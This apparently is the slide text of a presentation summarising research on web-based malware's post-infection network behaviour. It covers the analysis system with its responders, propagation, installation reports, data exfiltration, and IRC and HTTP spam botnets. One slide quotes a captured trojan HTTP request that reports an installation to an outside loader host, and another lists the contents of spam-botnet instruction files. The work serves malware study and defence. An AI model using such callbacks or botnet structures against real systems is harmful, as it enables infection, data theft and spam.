1

Introduction The underground Internet economy Web-based malware The system analyzing the post-infection network behavior of web-based malware How do malware’s behaviors taken together provide a compelling perspective on the life cycle of web-based malware? 2

System Architecture  The goal of the system detect harmful URLs on the web  The brief overview of the overall system they used in their prior work machine learning techniques are used to find suspicious URLs among a large number of web pages for verification in a virtual machine  The new extended system Responders 3

System Architecture 4 Over system architecture o Virtual machine used o Observed features: Links to known malware distribution sites Suspicious HTML element The presence of code obfuscation. o Machine learning system Scores if the URL has a high score o Verification results used to retrain the machine learning system

System Architecture  They extended the system improving verification components with light-weight responders  Providing fabricated responses for protocols such as SMTP, FTP and IRC  HTTP proxy is to record all HTTP requests and scan all HTTP responses  Generic responder is to hand off connections over nonstandard ports and identify connections that use unknown protocols Responders 5

 Network flow in the verification component 6

Life cycle of web-based malware o Malware’s interaction with other hosts and responders are organized into 3 categories: 1.Propagation 2.Data exfiltration 3.Remote control o They analyzed the post-infection activity and the result of these behaviors to find out the life cycle of web-based malware 7

Life cycle of web-based malware Data Set  In 2 months virtual machine analyzed URLs from 5,756,000 unique host names and report on unique names  At least one harmful URL in 307,000 hostnames  %49 of these websites had URLs that resulted in HTTP request initiated from process other than the web browser  %5 of the sites had URLs that activated responder session  The total number of responder sessions with transmitted data is more than 448,000  They observed that malware made network connections without transmitting data in many more cases 8

Life cycle of web-based malware Network characteristics  The destination ports of all outgoing connections from the virtual machine upon infection 9

Life cycle of web-based malware Network characteristics  They notified the number of unique hostnames for each port On these hosts at least one URL installs malware that transmitted data to that port  More than 400 different destination ports were connected This shows the diverse nature of malware’s post- infection network behavior 10

 The exact distribution of HTTP connections destined to nonstandard ports according to the destination port number 11

Life cycle of web-based malware Discovery and Propagation  Malwares usually scan for other vulnerable systems either in the same lan or on the internet to propagate 12  This figure shows the network protocol distribution used by malware

Life cycle of web-based malware Reporting Home  To observe this activity SMTP responders are employed to capture s  Each captured has a subject and body 13

TABLE 1 Subject # Messages XP Hacked390 ProRat [...]162 Vip Passw0rds98 Log file from...82 Installation report76 Perfect Keylogger [...]47 Installation on XP succeeded12 E g y S p y KeyLogger [...]12 INFECTADO6 Mais 1: XP3 AVSXP3 C-h-e-c-k-i-n-g:XP2...:Noticia quentinha de:... XP 2  Table 1 shows that the most common subjects SMTP Server# Messages yahoo.com436 google.com118 tvm.com.tr98 aol.com82 hotmail.com19 outblaze.com8 globo.com6 Life cycle of web-based malware Reporting Home Table 2 above shows that the common SMTP servers used by malware to send installation reports 14

Life cycle of web-based malware Reporting Home GET /geturl.php?version=1.1.2&fid=7493&mac= &lversion=&wversion=&day=0&name=dodolook&recent=0 HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; ) Host: loader.51edm.net:1207 Cache-Control: no-cache  The HHTP protocol is also used to report successful installations back to malware authors  The trojan example: 15

Life cycle of web-based malware Reporting Home  Malware also reported infections using a custom XML-like format HGZ :55:30 80 _& Windows XP 5.1 XP 488 Ver XP English (United States) Windows XP 1024MB 2200 MHz LAN

Life cycle of web-based malware Data exfiltration  There are indications of data exfiltration in responder sessions such as browser history files and stored passwords o In their observation, they found some s that send back stored password from a compromised machine o HTTP is also used for sending sensitive information back to data collection servers (notice the large number of POST requests on the graph on slide #11) 17

Life cycle of web-based malware Data exfiltration  In 2 days, one server had 4,729 files including more than 250,000 valid addresses  They found more sensitive information in extensive logs continuously uploaded by malware Logs have victim’s IP address, DNS server, gateway, MAC address, username, URL, intercepted form and password fields of HTTP request o In 250MB logs, 500 usernames and passwords were found for over 250 web sites such as banking site, google.com, yahoo.com, etc. 18

Life cycle of web-based malware Joining Botnets  Botnets  They encountered 2 types of botnets in their work: 1.IRC Botnets 2.HTTP Botnets 19

Life cycle of web-based malware IRC Botnets  IRC and C&C communication  IRC sessions to 90 servers were observed using 1587 different nicknames in 95 channels 20

Life cycle of web-based malware IRC Botnets  Some malwares use regular nicknames and channels, but some of them use artificial nicknames such as [0]USA|XP[P] or Inject-2l

Life cycle of web-based malware HTTP Botnets  Organize large-scale spam campaigns  To participate in spam campaigns each bot repeatedly downloaded ZIP-archives with instructions using HTTP requests  Each response has a ZIP-archive with instructions on how to participate in spam campaigns 22

Life cycle of web-based malware HTTP Botnets  Some example instructions:  000_data22 - a list of domains and their authoritative name severs used to form the sender's address  001_ncommall - a list of common first names used as part of the sender's address  002_otkogo_r - a list of possible ``from'' names related to the subject of the spam campaign  003_subj_rep - a list of possible subjects,  004_outlook - the template of the spam ,  config - a configuration file that instructs the bot how to construct s from the data files, how many s to sent in total, and how many connections are allowed at a given time,  message - the message body of the spam campaign,  mlist - a list of addresses to which to send the spam,  andmxdata - a binary file containing information about the mail- exchange servers for the addresses in mlist 23

Life cycle of web-based malware HTTP Botnets Top domains out of 700,000 addresses collected from a spam- sending botnet. DomainFrequency yahoo.com28899 sbcglobal.net14417 yahoo.co.uk8939 shaw.ca8321 hotmail.com6985 korea.com6041 yahoo.co.jp5215 striker.ottawa.on.ca4415 web.de4276 yahoo.co.in 4200 o The most frequent domains captured in an hour didn’t entirely overlap with the larger data set 24

Summary and Conclusion 25